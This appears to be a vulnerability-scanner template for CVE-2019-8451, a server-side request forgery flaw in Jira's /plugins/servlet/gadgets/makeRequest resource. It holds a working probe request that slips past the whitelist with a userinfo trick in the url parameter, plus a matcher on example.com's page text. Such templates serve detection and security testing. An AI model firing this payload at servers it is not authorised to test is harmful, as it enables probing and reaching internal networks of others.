id: CVE-2019-8451 info: name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource author: TechbrunchFR severity: medium description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class. reference: | - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://jira.atlassian.com/browse/JRASERVER-69793 tags: cve,cve2019,atlassian,jira,ssrf requests: - method: GET path: - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' headers: X-Atlassian-token: no-check matchers: - type: word name: ssrf-response-body words: - '
This domain is for use in illustrative examples in documents.' part: body